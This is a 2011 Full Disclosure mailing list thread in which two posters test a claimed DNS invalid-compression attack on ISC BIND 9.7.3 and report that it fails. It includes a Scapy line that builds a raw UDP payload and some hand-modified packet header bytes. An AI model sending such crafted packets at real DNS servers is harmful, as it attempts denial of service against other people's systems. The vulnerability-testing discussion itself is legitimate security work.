Full Disclosure
mailing list archives
Re: Semi 0day DNS Invalid Compression attack
From: Francisco J. Gómez Rodríguez <ffranz () iniqua com>
Date: Thu, 14 Jul 2011 12:27:19 +0200
Proof doesn't work on my own ISC BIND 9.7.3 either. :-(
By the way, you can use Scapy to create the packet:
a=IP(dst="127.0.0.1")/UDP(sport=RandInt(),chksum=0)/Raw(
load='\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x41\x42\x43\x44\x45\x00\x00\x00\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x41\x42\x43\x44\x45\x00\x00\x00\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x41\x42\x43\x44\x45\x00\x00\x00')
regards...
On Mon, Jul 11, 2011 at 3:31 PM, Kai <kai () rhynn net> wrote:
Hi,
tested on isc bind 9.7.3, on opensuse 11.4.
sent a few packets to myself:
--> [1000000]: (127.0.0.1)->(127.0.0.1)
--> Done.
and named felt beautiful along the test:
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
2844 named 20 0 111m 22m 2456 S 0 0.2 0:00.09 named
named -V:
BIND 9.7.3 built with '--prefix=/usr' '--bindir=/usr/bin'
'--sbindir=/usr/sbin' '--sysconfdir=/etc' '--localstatedir=/var'
'--libdir=/usr/lib' '--includedir=/usr/include/bind'
'--mandir=/usr/share/man' '--infodir=/usr/share/info' '--with-openssl'
'--enable-threads' '--with-libtool' '--enable-runidn' '--with-libxml2'
'--with-dlz-mysql' '--with-dlz-ldap' '--with-gssapi'
'CFLAGS=-fomit-frame-pointer -fmessage-length=0 -O2 -Wall
-D_FORTIFY_SOURCE=2 -fstack-protector -funwind-tables
-fasynchronous-unwind-tables -g -fno-strict-aliasing'
'LDFLAGS=-L/usr/lib'
you said that packet was like
# 4500 002b 512f 4000 3411 92a9 2989 601e
so i've changed packet header to
"\x45\x00\x00\x2b\x51\x2f\x40\x00\x34\x11\x92\xa9" and length to
"\x00\x4a" (74, right?) but still no luck. Any thoughts?
--
Cheers,
Kai
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/